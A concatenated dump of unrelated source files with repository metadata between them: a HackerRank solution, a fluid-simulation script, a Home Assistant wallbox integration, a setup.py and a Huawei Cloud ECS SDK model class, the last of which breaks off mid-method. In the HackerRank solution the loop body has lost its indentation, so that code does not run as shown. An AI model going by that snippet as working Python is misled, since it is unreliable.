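# DijkstraProcess holds each vertex's parent, so a shortest path to any target
# vertex could be recovered with something like:
#
# def reconstruct_path(pv, target):
#     path = [target]
#     while pv[path[-1]] is not None:
#         path.append(pv[path[-1]])
#     return list(reversed(path))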
| 50.777778
| 151
| 0.52565
|
c693cf454d68a6f6c5193c68e4b2ebb6b0a9ddc1
| 328
|
py
|
Python
|
Python/Finding the percentage/Solution.py
|
chessmastersan/HackerRank
|
850319e6f79e7473afbb847d28edde7b2cdfc37d
|
[
"MIT"
] | 2
|
2019-08-07T19:58:20.000Z
|
2019-08-27T00:06:09.000Z
|
Python/Finding the percentage/Solution.py
|
chessmastersan/HackerRank
|
850319e6f79e7473afbb847d28edde7b2cdfc37d
|
[
"MIT"
] | 1
|
2020-06-11T19:09:48.000Z
|
2020-06-11T19:09:48.000Z
|
Python/Finding the percentage/Solution.py
|
chessmastersan/HackerRank
|
850319e6f79e7473afbb847d28edde7b2cdfc37d
|
[
"MIT"
] | 7
|
2019-08-27T00:06:11.000Z
|
2021-12-11T10:01:45.000Z
|
#author SANKALP SAXENA
n = int(input())
names = []
marks = []
for i in range(0, n):
string = input().split(" ")
names.append(string[0])  # keep the student's name so the queried average can be looked up
marks.append((float(string[1]) + float(string[2]) + float(string[3]))/3)
name = input()
index = names.index(name)
print("%.2f"%marks[index])
| 16.4
| 76
| 0.560976
|
71f915eb02a4207f5a15932865d641d55b8dc9b3
| 1,892
|
py
|
Python
|
docs/hydro_tests/run_kelvin_helmholtz.py
|
henrywatkins/gawain
|
c556be20242249504fc0e04a5d3b7168a8369043
|
[
"MIT"
] | 1
|
2021-11-20T06:16:13.000Z
|
2021-11-20T06:16:13.000Z
|
docs/hydro_tests/run_kelvin_helmholtz.py
|
henrywatkins/gawain
|
c556be20242249504fc0e04a5d3b7168a8369043
|
[
"MIT"
] | null | null | null |
docs/hydro_tests/run_kelvin_helmholtz.py
|
henrywatkins/gawain
|
c556be20242249504fc0e04a5d3b7168a8369043
|
[
"MIT"
] | null | null | null |
"""Kelvin-Helmholtz instability test script
"""
import numpy as np
from gawain.main import run_gawain
run_name = "kelvin_helmholtz"
output_dir = "."
cfl = 0.5
with_mhd = False
t_max = 5.0
# "euler",
integrator = "euler"
# "base", "lax-wendroff", "lax-friedrichs", "hll"
fluxer = "hll"
################ MESH #####################
nx, ny, nz = 256, 256, 1
mesh_shape = (nx, ny, nz)
n_outputs = 100
lx, ly, lz = 1.0, 1.0, 0.001
mesh_size = (lx, ly, lz)
x = np.linspace(-lx / 2.0, lx / 2.0, num=nx)
y = np.linspace(-ly / 2.0, ly / 2.0, num=ny)
z = np.linspace(0.0, lz, num=nz)
X, Y, Z = np.meshgrid(x, y, z, indexing="ij")
############ INITIAL CONDITION #################
adiabatic_idx = 1.4
rho = np.piecewise(Y, [np.absolute(Y) > 0.25, np.absolute(Y) <= 0.25], [1.0, 2.0])
vx = np.piecewise(Y, [np.absolute(Y) > 0.25, np.absolute(Y) <= 0.25], [-0.5, 0.5])
seedx = 0.02 * np.random.rand(*mesh_shape)
vy = 0.02 * np.random.rand(*mesh_shape)
pressure = 2.5 * np.ones(mesh_shape)
mx = rho * vx * (1.0 + seedx)
my = rho * vy
mz = np.zeros(mesh_shape)
e = pressure / (adiabatic_idx - 1.0) + 0.5 * (mx ** 2 + my ** 2 + mz ** 2) / rho
initial_condition = np.array([rho, mx, my, mz, e])
############## BOUNDARY CONDITION ######################
# available types: periodic, fixed
boundary_conditions = ["periodic", "periodic", "periodic"]
############## DO NOT EDIT BELOW ############################
config = {
"run_name": run_name,
"cfl": cfl,
"mesh_shape": mesh_shape,
"mesh_size": mesh_size,
"t_max": t_max,
"n_dumps": n_outputs,
"initial_condition": initial_condition,
"boundary_type": boundary_conditions,
"adi_idx": adiabatic_idx,
"integrator": integrator,
"fluxer": fluxer,
"output_dir": output_dir,
"with_mhd": with_mhd,
}
run_gawain(config)
| 23.949367
| 83
| 0.554968
|
0ef2ce10e562c530cb7f2924e64ba78081e40847
| 313
|
py
|
Python
|
modutec/config/docs.py
|
Momscode-Technologies/modutec
|
4b747283d7d7524ef78747dc06deb0a368838c14
|
[
"MIT"
] | null | null | null |
modutec/config/docs.py
|
Momscode-Technologies/modutec
|
4b747283d7d7524ef78747dc06deb0a368838c14
|
[
"MIT"
] | null | null | null |
modutec/config/docs.py
|
Momscode-Technologies/modutec
|
4b747283d7d7524ef78747dc06deb0a368838c14
|
[
"MIT"
] | null | null | null |
"""
Configuration for docs
"""
# source_link = "https://github.com/[org_name]/modutec"
# docs_base_url = "https://[org_name].github.io/modutec"
# headline = "App that does everything"
# sub_heading = "Yes, you got that right the first time, everything"
def get_context(context):
context.brand_html = "Modutec"
| 26.083333
| 68
| 0.722045
|
172c38eb796a1b2dd83e2e62803c0038d2c0e2d5
| 8,041
|
py
|
Python
|
custom_components/keba/__init__.py
|
dannerph/homeassistant-keba
|
1b8cae2efabb80dab940306fe303e33e84fafd10
|
[
"Apache-2.0"
] | 3
|
2022-01-13T22:31:55.000Z
|
2022-02-17T19:02:27.000Z
|
custom_components/keba/__init__.py
|
dannerph/homeassistant-keba
|
1b8cae2efabb80dab940306fe303e33e84fafd10
|
[
"Apache-2.0"
] | 4
|
2022-01-15T12:29:29.000Z
|
2022-01-16T14:30:40.000Z
|
custom_components/keba/__init__.py
|
dannerph/homeassistant-keba
|
1b8cae2efabb80dab940306fe303e33e84fafd10
|
[
"Apache-2.0"
] | null | null | null |
"""Support for KEBA charging stations."""
from __future__ import annotations
import logging
from keba_kecontact.connection import KebaKeContact, SetupError
from keba_kecontact.wallbox import Wallbox
from homeassistant.components.notify import DOMAIN as NOTIFY_DOMAIN
from homeassistant.config_entries import SOURCE_IMPORT, ConfigEntry
from homeassistant.const import CONF_DEVICE_ID, CONF_HOST, CONF_NAME, Platform
from homeassistant.core import HomeAssistant, ServiceCall
from homeassistant.exceptions import ConfigEntryNotReady
from homeassistant.helpers import device_registry, discovery
from homeassistant.helpers.entity import DeviceInfo, Entity, EntityDescription
from homeassistant.helpers.typing import ConfigType
from homeassistant.util import slugify
from .const import (
CONF_FS,
CONF_FS_FALLBACK,
CONF_FS_PERSIST,
CONF_FS_TIMEOUT,
CONF_RFID,
CONF_RFID_CLASS,
DATA_HASS_CONFIG,
DOMAIN,
KEBA_CONNECTION,
WALLBOXES,
)
_LOGGER = logging.getLogger(__name__)
PLATFORMS = [
Platform.BINARY_SENSOR,
Platform.LOCK,
Platform.BUTTON,
Platform.NOTIFY,
Platform.SENSOR,
Platform.NUMBER,
]
async def async_setup(hass: HomeAssistant, config: ConfigType) -> bool:
"""Set up the KEBA charging station component from configuration.yaml."""
hass.data.setdefault(DOMAIN, {})
hass.data[DOMAIN][DATA_HASS_CONFIG] = config
if DOMAIN in config:
hass.async_create_task(
hass.config_entries.flow.async_init(
DOMAIN, context={"source": SOURCE_IMPORT}, data=config[DOMAIN]
)
)
return True
async def async_setup_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool:
"""Set up KEBA charging station from a config entry."""
keba = await setup_keba_connection(hass)
try:
wallbox = await keba.setup_wallbox(entry.data[CONF_HOST])
except SetupError as exc:
raise ConfigEntryNotReady(f"{entry.data[CONF_HOST]} not reachable") from exc
hass.data[DOMAIN][WALLBOXES][entry.entry_id] = wallbox
# Set failsafe mode at start up of Home Assistant
try:
fs_timeout = entry.options[CONF_FS_TIMEOUT] if entry.options[CONF_FS] else 0
fs_fallback = entry.options[CONF_FS_FALLBACK]
fs_persist = entry.options[CONF_FS_PERSIST]
hass.loop.create_task(wallbox.set_failsafe(fs_timeout, fs_fallback, fs_persist))
except KeyError:
_LOGGER.debug(
"Options for charging station %s not available", wallbox.device_info.model
)
except ValueError as ex:
_LOGGER.warning("Could not set failsafe mode %s", ex)
# Add update listener for config entry changes (options)
entry.async_on_unload(entry.add_update_listener(update_listener))
# Register services to hass
async def execute_service(call: ServiceCall) -> None:
"""Execute a service for a wallbox."""
device_id: str | None = str(call.data.get(CONF_DEVICE_ID))
wallbox: Wallbox | None = None
# from device_id to wallbox
if not (device := device_registry.async_get(hass).async_get(device_id)):
_LOGGER.error("Could not find a device for id: %s", device_id)
return
config_entry = hass.config_entries.async_get_entry(
next(iter(device.config_entries))
)
host = config_entry.data[CONF_HOST]
if not (wallbox := keba.get_wallbox(host)):
_LOGGER.error("Could not find a charging station with host %s", host)
return
function_call = getattr(wallbox, call.service)
additional_args = {}
if call.service in ["start", "stop"]:
if (
CONF_RFID not in call.data
and CONF_RFID in entry.options
and entry.options[CONF_RFID] != ""
):
additional_args[CONF_RFID] = entry.options[CONF_RFID]
if (
CONF_RFID_CLASS not in call.data
and CONF_RFID_CLASS in entry.options
and entry.options[CONF_RFID_CLASS] != ""
):
additional_args[CONF_RFID_CLASS] = entry.options[CONF_RFID_CLASS]
await function_call(**call.data, **additional_args)
for service in wallbox.device_info.available_services():
if service == "display":
# set up notify platform, no entry support for notify platform yet,
# have to use discovery to load platform.
hass.async_create_task(
discovery.async_load_platform(
hass,
NOTIFY_DOMAIN,
DOMAIN,
{CONF_NAME: DOMAIN},
hass.data[DOMAIN][DATA_HASS_CONFIG],
)
)
else:
hass.services.async_register(DOMAIN, service, execute_service)
# Load platforms
hass.config_entries.async_setup_platforms(
entry, [platform for platform in PLATFORMS if platform != Platform.NOTIFY]
)
return True
async def async_unload_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool:
"""Unload a config entry."""
keba = hass.data[DOMAIN][KEBA_CONNECTION]
unload_ok = await hass.config_entries.async_unload_platforms(
entry, [platform for platform in PLATFORMS if platform != Platform.NOTIFY]
)
# Remove notify
wallbox = keba.get_wallbox(entry.data[CONF_HOST])
if "display" in wallbox.device_info.available_services():
hass.services.async_remove(
NOTIFY_DOMAIN, f"{DOMAIN}_{slugify(wallbox.device_info.model)}"
)
# Only remove services if it is the last wallbox
if len(hass.data[DOMAIN][WALLBOXES]) == 1:
_LOGGER.debug("Removing last charging station, cleanup services and notify")
for service in wallbox.device_info.available_services():
if service == "display":
hass.services.async_remove(NOTIFY_DOMAIN, DOMAIN)
else:
hass.services.async_remove(DOMAIN, service)
if unload_ok:
keba.remove_wallbox(entry.data[CONF_HOST])
hass.data[DOMAIN][WALLBOXES].pop(entry.entry_id)
return unload_ok
async def update_listener(hass: HomeAssistant, config_entry: ConfigEntry) -> None:
"""Handle options update."""
await hass.config_entries.async_reload(config_entry.entry_id)
async def setup_keba_connection(hass: HomeAssistant) -> KebaKeContact:
"""Set up internal keba connection (ensure same keba connection instance)."""
hass.data.setdefault(DOMAIN, {})
hass.data[DOMAIN].setdefault(WALLBOXES, {})
if KEBA_CONNECTION not in hass.data[DOMAIN]:
hass.data[DOMAIN][KEBA_CONNECTION] = KebaKeContact(hass.loop)
return hass.data[DOMAIN][KEBA_CONNECTION]
class KebaBaseEntity(Entity):
"""Common base for Keba Wallbox entities."""
_attr_should_poll = False
def __init__(
self,
wallbox: Wallbox,
description: EntityDescription,
) -> None:
"""Initialize sensor."""
self._wallbox = wallbox
self.entity_description = description
wb_info = self._wallbox.device_info
self._attr_name = f"{wb_info.manufacturer} {wb_info.model} {description.name}"
self._attr_unique_id = f"{DOMAIN}-{wb_info.device_id}-{description.key}"
self._attr_device_info = DeviceInfo(
identifiers={(DOMAIN, wb_info.device_id)},
manufacturer=wb_info.manufacturer,
model=wb_info.model,
name=f"{wb_info.manufacturer} {wb_info.model}",
sw_version=wb_info.sw_version,
configuration_url=wb_info.webconfigurl,
)
def update_callback(self, wallbox: Wallbox, data) -> None:
"""Schedule a state update."""
self.schedule_update_ha_state(True)
async def async_added_to_hass(self) -> None:
"""Add callback after being added to hass.
Show latest data after startup.
"""
self._wallbox.add_callback(self.update_callback)
| 34.659483
| 88
| 0.667703
|
f3aad57b78e6490e3cdf0f8b22cd5dfda5cccae3
| 2,245
|
py
|
Python
|
setup.py
|
bliptrip/python-fooster-cron
|
a7d818023f693ad4d614826ebb88d25bcc055b6d
|
[
"MIT"
] | null | null | null |
setup.py
|
bliptrip/python-fooster-cron
|
a7d818023f693ad4d614826ebb88d25bcc055b6d
|
[
"MIT"
] | null | null | null |
setup.py
|
bliptrip/python-fooster-cron
|
a7d818023f693ad4d614826ebb88d25bcc055b6d
|
[
"MIT"
] | 1
|
2021-02-24T15:34:12.000Z
|
2021-02-24T15:34:12.000Z
|
#!/usr/bin/env python3
import os
import re
from setuptools import setup, find_packages
version = None
def find(haystack, *needles):
regexes = [(index, re.compile(r'^{}\s*=\s*[\'"]([^\'"]*)[\'"]$'.format(needle))) for index, needle in enumerate(needles)]
values = ['' for needle in needles]
for line in haystack:
if len(regexes) == 0:
break
for rindex, (vindex, regex) in enumerate(regexes):
match = regex.match(line)
if match:
values[vindex] = match.groups()[0]
del regexes[rindex]
break
if len(needles) == 1:
return values[0]
else:
return values
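# Quick illustration of the find() helper above (hypothetical inputs, not part of the
# original setup.py): it pulls quoted assignment values out of an iterable of lines,
# returning a single value for one needle and a list (in needle order) for several.
assert find(["__version__ = '1.2.3'"], '__version__') == '1.2.3'
assert find(["name = 'x'", "ver = '2'"], 'ver', 'name') == ['2', 'x']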
with open(os.path.join(os.path.dirname(__file__), 'fooster', 'cron', '__init__.py'), 'r') as cron:
version = find(cron, '__version__')
with open(os.path.join(os.path.dirname(__file__), 'README.md'), 'r') as rfile:
readme = rfile.read()
setup(
name='fooster-cron',
version=version,
description='a small cron-like scheduler in Python',
long_description=readme,
long_description_content_type='text/markdown',
license='MIT',
url='https://github.com/lilyinstarlight/python-fooster-cron',
author='Lily Foster',
author_email='lily@lily.flowers',
packages=find_packages(),
namespace_packages=['fooster'],
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Web Environment',
'Environment :: No Input/Output (Daemon)',
'Intended Audience :: Developers',
'License :: Freely Distributable',
'License :: OSI Approved :: MIT License',
'Operating System :: POSIX',
'Operating System :: POSIX :: Linux',
'Operating System :: MacOS :: MacOS X',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
'Programming Language :: Python :: Implementation',
'Programming Language :: Python :: Implementation :: CPython',
'Topic :: Software Development :: Libraries',
],
)
| 30.753425
| 125
| 0.6
|
9d60a3f07aa515baaee669fd9255d8f3b73c4244
| 23,153
|
py
|
Python
|
huaweicloud-sdk-ecs/huaweicloudsdkecs/v2/model/pre_paid_server.py
|
wuchen-huawei/huaweicloud-sdk-python-v3
|
3683d703f4320edb2b8516f36f16d485cff08fc2
|
[
"Apache-2.0"
] | 1
|
2021-04-16T07:59:28.000Z
|
2021-04-16T07:59:28.000Z
|
huaweicloud-sdk-ecs/huaweicloudsdkecs/v2/model/pre_paid_server.py
|
wuchen-huawei/huaweicloud-sdk-python-v3
|
3683d703f4320edb2b8516f36f16d485cff08fc2
|
[
"Apache-2.0"
] | null | null | null |
huaweicloud-sdk-ecs/huaweicloudsdkecs/v2/model/pre_paid_server.py
|
wuchen-huawei/huaweicloud-sdk-python-v3
|
3683d703f4320edb2b8516f36f16d485cff08fc2
|
[
"Apache-2.0"
] | 1
|
2022-01-17T02:24:18.000Z
|
2022-01-17T02:24:18.000Z
|
# coding: utf-8
import pprint
import re
import six
class PrePaidServer:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'auto_terminate_time': 'str',
'image_ref': 'str',
'flavor_ref': 'str',
'name': 'str',
'user_data': 'str',
'admin_pass': 'str',
'key_name': 'str',
'vpcid': 'str',
'nics': 'list[PrePaidServerNic]',
'publicip': 'PrePaidServerPublicip',
'count': 'int',
'is_auto_rename': 'bool',
'root_volume': 'PrePaidServerRootVolume',
'data_volumes': 'list[PrePaidServerDataVolume]',
'security_groups': 'list[PrePaidServerSecurityGroup]',
'availability_zone': 'str',
'extendparam': 'PrePaidServerExtendParam',
'metadata': 'dict(str, str)',
'osscheduler_hints': 'PrePaidServerSchedulerHints',
'tags': 'list[str]',
'server_tags': 'list[PrePaidServerTag]',
'description': 'str'
}
attribute_map = {
'auto_terminate_time': 'auto_terminate_time',
'image_ref': 'imageRef',
'flavor_ref': 'flavorRef',
'name': 'name',
'user_data': 'user_data',
'admin_pass': 'adminPass',
'key_name': 'key_name',
'vpcid': 'vpcid',
'nics': 'nics',
'publicip': 'publicip',
'count': 'count',
'is_auto_rename': 'isAutoRename',
'root_volume': 'root_volume',
'data_volumes': 'data_volumes',
'security_groups': 'security_groups',
'availability_zone': 'availability_zone',
'extendparam': 'extendparam',
'metadata': 'metadata',
'osscheduler_hints': 'os:scheduler_hints',
'tags': 'tags',
'server_tags': 'server_tags',
'description': 'description'
}
def __init__(self, auto_terminate_time=None, image_ref=None, flavor_ref=None, name=None, user_data=None, admin_pass=None, key_name=None, vpcid=None, nics=None, publicip=None, count=None, is_auto_rename=None, root_volume=None, data_volumes=None, security_groups=None, availability_zone=None, extendparam=None, metadata=None, osscheduler_hints=None, tags=None, server_tags=None, description=None):
"""PrePaidServer - a model defined in huaweicloud sdk"""
self._auto_terminate_time = None
self._image_ref = None
self._flavor_ref = None
self._name = None
self._user_data = None
self._admin_pass = None
self._key_name = None
self._vpcid = None
self._nics = None
self._publicip = None
self._count = None
self._is_auto_rename = None
self._root_volume = None
self._data_volumes = None
self._security_groups = None
self._availability_zone = None
self._extendparam = None
self._metadata = None
self._osscheduler_hints = None
self._tags = None
self._server_tags = None
self._description = None
self.discriminator = None
if auto_terminate_time is not None:
self.auto_terminate_time = auto_terminate_time
self.image_ref = image_ref
self.flavor_ref = flavor_ref
self.name = name
if user_data is not None:
self.user_data = user_data
if admin_pass is not None:
self.admin_pass = admin_pass
if key_name is not None:
self.key_name = key_name
self.vpcid = vpcid
self.nics = nics
if publicip is not None:
self.publicip = publicip
if count is not None:
self.count = count
if is_auto_rename is not None:
self.is_auto_rename = is_auto_rename
self.root_volume = root_volume
if data_volumes is not None:
self.data_volumes = data_volumes
if security_groups is not None:
self.security_groups = security_groups
self.availability_zone = availability_zone
if extendparam is not None:
self.extendparam = extendparam
if metadata is not None:
self.metadata = metadata
if osscheduler_hints is not None:
self.osscheduler_hints = osscheduler_hints
if tags is not None:
self.tags = tags
if server_tags is not None:
self.server_tags = server_tags
if description is not None:
self.description = description
@property
def auto_terminate_time(self):
"""Gets the auto_terminate_time of this PrePaidServer.
Time when the ECS will be automatically released. Time format example: 2020-01-19T03:30:52Z
:return: The auto_terminate_time of this PrePaidServer.
:rtype: str
"""
return self._auto_terminate_time
@auto_terminate_time.setter
def auto_terminate_time(self, auto_terminate_time):
"""Sets the auto_terminate_time of this PrePaidServer.
Time when the ECS will be automatically released. Time format example: 2020-01-19T03:30:52Z
:param auto_terminate_time: The auto_terminate_time of this PrePaidServer.
:type: str
"""
self._auto_terminate_time = auto_terminate_time
@property
def image_ref(self):
"""Gets the image_ref of this PrePaidServer.
System image used to create the ECS. Specify the ID of an existing image; the ID is in Universally Unique Identifier (UUID) format.
:return: The image_ref of this PrePaidServer.
:rtype: str
"""
return self._image_ref
@image_ref.setter
def image_ref(self, image_ref):
"""Sets the image_ref of this PrePaidServer.
System image used to create the ECS. Specify the ID of an existing image; the ID is in Universally Unique Identifier (UUID) format.
:param image_ref: The image_ref of this PrePaidServer.
:type: str
"""
self._image_ref = image_ref
@property
def flavor_ref(self):
"""Gets the flavor_ref of this PrePaidServer.
ID of the flavor (system specification) used to create the ECS. For the flavors currently available, see the 'Instance Types and Specifications' section of the [Elastic Cloud Server Product Introduction](https://support.huaweicloud.com/ecs/index.html).
:return: The flavor_ref of this PrePaidServer.
:rtype: str
"""
return self._flavor_ref
@flavor_ref.setter
def flavor_ref(self, flavor_ref):
"""Sets the flavor_ref of this PrePaidServer.
ID of the flavor (system specification) used to create the ECS. For the flavors currently available, see the 'Instance Types and Specifications' section of the [Elastic Cloud Server Product Introduction](https://support.huaweicloud.com/ecs/index.html).
:param flavor_ref: The flavor_ref of this PrePaidServer.
:type: str
"""
self._flavor_ref = flavor_ref
@property
def name(self):
"""Gets the name of this PrePaidServer.
ECS name. Value range: - Can contain only Chinese characters, letters, digits, underscores (_), hyphens (-) and periods (.), and must be 1 to 64 characters long. - When the number of ECSs to create (the count field) is greater than 1, the system automatically appends a suffix such as '-0000' to the name to distinguish the ECSs, so the name may then be at most 59 characters long. > Note: > > The internal hostname of the ECS follows RFC 952 and RFC 1123; names made of a-z, A-Z, 0-9 and hyphens (-) are recommended, and underscores (_) are converted to hyphens (-) inside the ECS by default.
:return: The name of this PrePaidServer.
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this PrePaidServer.
ECS name. Value range: - Can contain only Chinese characters, letters, digits, underscores (_), hyphens (-) and periods (.), and must be 1 to 64 characters long. - When the number of ECSs to create (the count field) is greater than 1, the system automatically appends a suffix such as '-0000' to the name to distinguish the ECSs, so the name may then be at most 59 characters long. > Note: > > The internal hostname of the ECS follows RFC 952 and RFC 1123; names made of a-z, A-Z, 0-9 and hyphens (-) are recommended, and underscores (_) are converted to hyphens (-) inside the ECS by default.
:param name: The name of this PrePaidServer.
:type: str
"""
self._name = name
@property
def user_data(self):
"""Gets the user_data of this PrePaidServer.
User data to inject while the ECS is being created. Text, text files and gzip files can be injected. For more information, see the 'Injecting User Data' section of the Elastic Cloud Server User Guide. Constraints: - The content must be base64 encoded and may be at most 32 KB before encoding. - When creating a password-authenticated Linux ECS, this field can inject a custom initial password for the root user; see the background information on setting the login authentication mode. Examples (before base64 encoding): - Linux ECS ``` #! /bin/bash echo user_test >> /home/user.txt ``` - Windows ECS ``` rem cmd echo 111 > c:\\aaa.tx ```
:return: The user_data of this PrePaidServer.
:rtype: str
"""
return self._user_data
@user_data.setter
def user_data(self, user_data):
"""Sets the user_data of this PrePaidServer.
User data to inject while the ECS is being created. Text, text files and gzip files can be injected. For more information, see the 'Injecting User Data' section of the Elastic Cloud Server User Guide. Constraints: - The content must be base64 encoded and may be at most 32 KB before encoding. - When creating a password-authenticated Linux ECS, this field can inject a custom initial password for the root user; see the background information on setting the login authentication mode. Examples (before base64 encoding): - Linux ECS ``` #! /bin/bash echo user_test >> /home/user.txt ``` - Windows ECS ``` rem cmd echo 111 > c:\\aaa.tx ```
:param user_data: The user_data of this PrePaidServer.
:type: str
"""
self._user_data = user_data
@property
def admin_pass(self):
"""Gets the admin_pass of this PrePaidServer.
To log in to the ECS with a password, use the adminPass field to specify the initial password of the administrator account (root for Linux, Administrator for Windows); see the background information on setting the login authentication mode. Password complexity requirements: - 8 to 26 characters long. - Must contain at least three of the following: uppercase letters, lowercase letters, digits and special characters (!@$%^-_=+[{}]:,./?). - Must not contain the username or the username in reverse order. - A Windows password must additionally not contain more than two consecutive characters of the username.
:return: The admin_pass of this PrePaidServer.
:rtype: str
"""
return self._admin_pass
@admin_pass.setter
def admin_pass(self, admin_pass):
"""Sets the admin_pass of this PrePaidServer.
To log in to the ECS with a password, use the adminPass field to specify the initial password of the administrator account (root for Linux, Administrator for Windows); see the background information on setting the login authentication mode. Password complexity requirements: - 8 to 26 characters long. - Must contain at least three of the following: uppercase letters, lowercase letters, digits and special characters (!@$%^-_=+[{}]:,./?). - Must not contain the username or the username in reverse order. - A Windows password must additionally not contain more than two consecutive characters of the username.
:param admin_pass: The admin_pass of this PrePaidServer.
:type: str
"""
self._admin_pass = admin_pass
@property
def key_name(self):
"""Gets the key_name of this PrePaidServer.
To log in to the ECS with an SSH key, specify the name of an existing key pair. A key pair can be created with the key creation API (see [Creating and Importing an SSH Key](https://support.huaweicloud.com/api-ecs/zh-cn_topic_0020212678.html)) or an existing key can be looked up with the SSH key query API (see [Querying SSH Keys](https://support.huaweicloud.com/api-ecs/zh-cn_topic_0020212676.html)).
:return: The key_name of this PrePaidServer.
:rtype: str
"""
return self._key_name
@key_name.setter
def key_name(self, key_name):
"""Sets the key_name of this PrePaidServer.
To log in to the ECS with an SSH key, specify the name of an existing key pair. A key pair can be created with the key creation API (see [Creating and Importing an SSH Key](https://support.huaweicloud.com/api-ecs/zh-cn_topic_0020212678.html)) or an existing key can be looked up with the SSH key query API (see [Querying SSH Keys](https://support.huaweicloud.com/api-ecs/zh-cn_topic_0020212676.html)).
:param key_name: The key_name of this PrePaidServer.
:type: str
"""
self._key_name = key_name
@property
def vpcid(self):
"""Gets the vpcid of this PrePaidServer.
Virtual Private Cloud (VPC) to which the ECS belongs. Specify the ID of an existing VPC, in UUID format.
:return: The vpcid of this PrePaidServer.
:rtype: str
"""
return self._vpcid
@vpcid.setter
def vpcid(self, vpcid):
"""Sets the vpcid of this PrePaidServer.
Virtual Private Cloud (VPC) to which the ECS belongs. Specify the ID of an existing VPC, in UUID format.
:param vpcid: The vpcid of this PrePaidServer.
:type: str
"""
self._vpcid = vpcid
@property
def nics(self):
"""Gets the nics of this PrePaidServer.
NIC information of the ECS to be created. Constraints: - The subnet of each NIC must belong to the VPC specified by vpcid. - A single ECS currently supports at most 12 NICs.
:return: The nics of this PrePaidServer.
:rtype: list[PrePaidServerNic]
"""
return self._nics
@nics.setter
def nics(self, nics):
"""Sets the nics of this PrePaidServer.
NIC information of the ECS to be created. Constraints: - The subnet of each NIC must belong to the VPC specified by vpcid. - A single ECS currently supports at most 12 NICs.
:param nics: The nics of this PrePaidServer.
:type: list[PrePaidServerNic]
"""
self._nics = nics
@property
def publicip(self):
"""Gets the publicip of this PrePaidServer.
:return: The publicip of this PrePaidServer.
:rtype: PrePaidServerPublicip
"""
return self._publicip
@publicip.setter
def publicip(self, publicip):
"""Sets the publicip of this PrePaidServer.
:param publicip: The publicip of this PrePaidServer.
:type: PrePaidServerPublicip
"""
self._publicip = publicip
@property
def count(self):
"""Gets the count of this PrePaidServer.
Number of ECSs to create. Constraints: - Defaults to 1 if this field is not passed. - The maximum value is 500 when the tenant quota is sufficient.
:return: The count of this PrePaidServer.
:rtype: int
"""
return self._count
@count.setter
def count(self, count):
"""Sets the count of this PrePaidServer.
Number of ECSs to create. Constraints: - Defaults to 1 if this field is not passed. - The maximum value is 500 when the tenant quota is sufficient.
:param count: The count of this PrePaidServer.
:type: int
"""
self._count = count
@property
def is_auto_rename(self):
"""Gets the is_auto_rename of this PrePaidServer.
Whether duplicate ECS names are allowed when creating ECSs in a batch; effective only when count is greater than 1. Defaults to True. - True: duplicate names are allowed. - False: duplicate names are not allowed.
:return: The is_auto_rename of this PrePaidServer.
:rtype: bool
"""
return self._is_auto_rename
@is_auto_rename.setter
def is_auto_rename(self, is_auto_rename):
"""Sets the is_auto_rename of this PrePaidServer.
Whether duplicate ECS names are allowed when creating ECSs in a batch; effective only when count is greater than 1. Defaults to True. - True: duplicate names are allowed. - False: duplicate names are not allowed.
:param is_auto_rename: The is_auto_rename of this PrePaidServer.
:type: bool
"""
self._is_auto_rename = is_auto_rename
@property
def root_volume(self):
"""Gets the root_volume of this PrePaidServer.
:return: The root_volume of this PrePaidServer.
:rtype: PrePaidServerRootVolume
"""
return self._root_volume
@root_volume.setter
def root_volume(self, root_volume):
"""Sets the root_volume of this PrePaidServer.
:param root_volume: The root_volume of this PrePaidServer.
:type: PrePaidServerRootVolume
"""
self._root_volume = root_volume
@property
def data_volumes(self):
"""Gets the data_volumes of this PrePaidServer.
Data disk configuration of the ECS; each structure describes one data disk to be created. Constraint: a newly created ECS can currently have at most 23 data disks attached.
:return: The data_volumes of this PrePaidServer.
:rtype: list[PrePaidServerDataVolume]
"""
return self._data_volumes
@data_volumes.setter
def data_volumes(self, data_volumes):
"""Sets the data_volumes of this PrePaidServer.
Data disk configuration of the ECS; each structure describes one data disk to be created. Constraint: a newly created ECS can currently have at most 23 data disks attached.
:param data_volumes: The data_volumes of this PrePaidServer.
:type: list[PrePaidServerDataVolume]
"""
self._data_volumes = data_volumes
@property
def security_groups(self):
"""Gets the security_groups of this PrePaidServer.
Security group information of the ECS. Constraint: if this value is empty, the default security group is bound to the ECS.
:return: The security_groups of this PrePaidServer.
:rtype: list[PrePaidServerSecurityGroup]
"""
return self._security_groups
@security_groups.setter
def security_groups(self, security_groups):
"""Sets the security_groups of this PrePaidServer.
Security group information of the ECS. Constraint: if this value is empty, the default security group is bound to the ECS.
:param security_groups: The security_groups of this PrePaidServer.
:type: list[PrePaidServerSecurityGroup]
"""
self._security_groups = security_groups
@property
def availability_zone(self):
"""Gets the availability_zone of this PrePaidServer.
Availability zone (AZ) in which to create the ECS; specify the AZ name. See [Regions and Endpoints](https://developer.huaweicloud.com/endpoint) to obtain it.
:return: The availability_zone of this PrePaidServer.
:rtype: str
"""
return self._availability_zone
@availability_zone.setter
def availability_zone(self, availability_zone):
"""Sets the availability_zone of this PrePaidServer.
Availability zone (AZ) in which to create the ECS; specify the AZ name. See [Regions and Endpoints](https://developer.huaweicloud.com/endpoint) to obtain it.
:param availability_zone: The availability_zone of this PrePaidServer.
:type: str
"""
self._availability_zone = availability_zone
@property
def extendparam(self):
"""Gets the extendparam of this PrePaidServer.
:return: The extendparam of this PrePaidServer.
:rtype: PrePaidServerExtendParam
"""
return self._extendparam
@extendparam.setter
def extendparam(self, extendparam):
"""Sets the extendparam of this PrePaidServer.
:param extendparam: The extendparam of this PrePaidServer.
:type: PrePaidServerExtendParam
"""
self._extendparam = extendparam
@property
def metadata(self):
"""Gets the metadata of this PrePaidServer.
